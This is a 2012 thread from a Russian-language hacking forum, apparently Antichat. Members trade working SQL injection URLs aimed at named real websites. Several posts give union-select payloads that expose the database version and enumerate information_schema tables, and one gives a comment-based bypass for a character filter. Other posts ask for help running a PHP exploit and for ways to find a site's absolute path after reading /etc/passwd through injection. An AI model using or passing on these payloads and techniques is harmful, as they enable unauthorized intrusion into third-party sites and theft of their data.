 |
|
28.07.2012, 14:10
|
|
Новичок
Регистрация: 28.09.2010
Сообщений: 29
С нами:
8222006
Репутация:
1
|
|
Сообщение от shell_c0de
http://prazdnik.com.ua/index.php?id=54&pid=3509+union+select+1,version(), 3,4,5,6,7,8,9,10,11,12,13,14,15--
Самые забавные первоапрельские розыгрыши 2013 на телефон
5.0.51a-24+lenny5-log
а как ты узнал что выводиться именно вторая колонка?
|
|
|
28.07.2012, 14:15
|
|
Reservists Of Antichat - Level 6
Регистрация: 07.07.2009
Сообщений: 324
С нами:
8866466
Репутация:
564
|
|
/thread43966.html
читай полностью.
именно пункт "2.1.2 Определение выводимых столбцов"
__________________
Никогда не бойся делать то, что ты не умеешь. Помни, ковчег был построен любителем. "Титаник" - проффесионалами.
|
|
|
|
28.07.2012, 14:15
|
|
Новичок
Регистрация: 14.12.2011
Сообщений: 0
С нами:
7585526
Репутация:
3
|
|
Сообщение от compod
а как ты узнал что выводиться именно вторая колонка?
|
|
|
|
28.07.2012, 14:51
|
|
Новичок
Регистрация: 14.12.2011
Сообщений: 0
С нами:
7585526
Репутация:
3
|
|
http://www.cheaz-sms.ru/index.php?p=gallerypic&img_id=-10/*!union%23%0aselect+1,2,3,table_name,5,6,7,8,9*/from%23%0ainformation_schema.tables--+f&galid=1&area=1&ascdesc=desc
Фильтруется точка,как нибудь обойти можно?
|
|
|
|
28.07.2012, 15:19
|
|
Постоянный
Регистрация: 25.04.2011
Сообщений: 505
С нами:
7921046
Репутация:
53
|
|
Сообщение от a.dimka
http://www.cheaz-sms.ru/index.php?p=gallerypic&img_id=-10/*!union%23%0aselect+1,2,3,table_name,5,6,7,8,9*/from%23%0ainformation_schema.tables--+f&galid=1&area=1&ascdesc=desc
Фильтруется точка,как нибудь обойти можно?
http://www.cheaz-sms.ru/index.php?p=gallerypic&img_id=-10 /*!union*//*!select*/ 1,2,3,(select table_name from `information_schema`.`tables` limit 1),5,6,7,8,9&galid=1&area=1&ascdesc=desc
|
|
|
|
30.07.2012, 07:05
|
|
Познающий
Регистрация: 29.01.2012
Сообщений: 44
С нами:
7519286
Репутация:
3
|
|
Пытаюсь заюзать вот этот эксплоит _/showpost.php?p=2748145&postcount=24
Но выдает ошибку syntax error, unexpected T_String in "путь до эксплоита" on line 169
Запускал так, забивал в командную строку "Путь до php.exe" "Путь до эксплоита"
Прошу помощи..)!
|
|
|
|
30.07.2012, 07:12
|
|
Постоянный
Регистрация: 06.01.2012
Сообщений: 913
С нами:
7552406
Репутация:
724
|
|
Строка 169, более подробно
Сообщение от None
$pmaur l
Убери пробелы. Делаю ставку на то, что после исправления, будет ошибка указывающая на 191 строку =) |
|
|
|
30.07.2012, 07:26
|
|
Познающий
Регистрация: 29.01.2012
Сообщений: 44
С нами:
7519286
Репутация:
3
|
|
Сообщение от VY_CMa
Строка 169, более подробно
Убери пробелы. Делаю ставку на то, что после исправления, будет ошибка указывающая на 191 строку =)
Ок, спасибо!! В следующий раз буду внимательней.
Жаль только что эксплоит выстрелил неудачно
|
|
|
|
30.07.2012, 16:19
|
|
Познающий
Регистрация: 02.07.2012
Сообщений: 51
С нами:
7296086
Репутация:
0
|
|
читается файл /etc/passwd через sql injection
как найти абсолютный путь к сайту?
|
|
|
|
30.07.2012, 17:35
|
|
Постоянный
Регистрация: 06.01.2012
Сообщений: 913
С нами:
7552406
Репутация:
724
|
|
Сообщение от Blacktell
читается файл /etc/passwd через sql injection
как найти абсолютный путь к сайту?
Говорю несколько способов.
Смотря какая CMS, для каждой есть свои способы
1) В куку сессии подставить спец символ, например "^"
2) Юзать гугл с текстом site:факме.рф intext:error
3) Пытаться подставлять в параметры зависящие от пользователя, т.е. head, post, get etc. всякую лабуду, которая может неправильно обработаться скриптом.
4) Найти phpinfo файл
5) Х*ярить сканером на файлы до посинения с помощью того же ArxScanSite с целью поиска файла оставленного мастером с таким содержанием: getcwd() или $SERVER['DOCUMENT_ROOT'] - если php конечно.
|
|
|
|
|
|
|
|
Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
|
|
|
|
Похожие темы
Линейный вид
